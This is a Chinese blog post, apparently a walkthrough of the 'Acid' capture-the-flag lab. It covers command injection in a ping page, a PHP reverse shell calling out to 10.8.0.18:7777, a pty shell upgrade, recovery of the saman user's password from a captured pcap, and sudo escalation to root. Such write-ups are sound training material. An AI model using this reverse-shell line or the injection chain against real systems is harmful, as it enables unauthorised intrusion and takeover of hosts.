云尘-Acid

本文描述了一次在Vulhub靶场上进行渗透测试的过程,从基础的RCE(RemoteCodeExecution)利用,通过Python交互获取bashshell,再到发现并利用`saman`用户权限提升,最终获取flag。
摘要由CSDN通过智能技术生成

vulhub的靶场

直接开扫

开始信息收集

robots.txt啥都给我用上

有一个 解码看看

访问不上 学了别人的wp 通过 dirbustr跑 选择字典开冲!

但是真的巨慢!!!

然后最后扫下来

Challenge/Magic_Box/command.php

发现了这个目录

这不就ctf 的 ping的rce么 直接执行命令看看

这里如果我们需要反弹shell 就需要通过bp的url编码

;php -r '$sock=fsockopen("10.8.0.18",7777);exec("/bin/sh <&3 >&3 2>&3");'

成功咯

 

现在要干嘛呢 当然是提权 现在只是小小的www-data权限 这里我们首先看看能不能开启bash

启用python交互

python -c 'import pty;pty.spawn("/bin/bash")'

这个时候就可以看到正常的shell了

然后我们摸索一下

看看passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:110::/home/syslog:/bin/false
messagebus:x:105:112::/var/run/dbus:/bin/false
uuidd:x:106:113::/run/uuidd:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
ntp:x:108:117::/home/ntp:/bin/false
whoopsie:x:109:118::/nonexistent:/bin/false
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
mysql:x:111:126:MySQL Server,,,:/nonexistent:/bin/false
saman:x:1001:1001:,,,:/home/saman:/bin/bash
www-data@acid:/var/www/html/Challenge/Magic_Box$

没啥用呀

但是先过一遍 这里提醒先注意saman

然后我们可以发现 这里有我们的题目名 acid 那么好办了 看看存在什么文件是acid执行的

find / -user acid -type f 2>/dev/null

获取到咯 这个流量包 我们开启服务下回本机

python2版本


python -m SimpleHTTPServer 8888

然后我们就获取了流量包 开始wireshark 看

然后我们只看tcp 看看有没有存在什么交互

感觉有东西

这里不就出现了 saman  这里也看到了 面 1337hax0r 这个其实就是我们刚刚开始的那个界面的字符串 我们看看能不能提权了

成功咯

然后看看权限

sudo -l

发现全都有 那么直接sudo su了

出现咯

得到flag咯

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值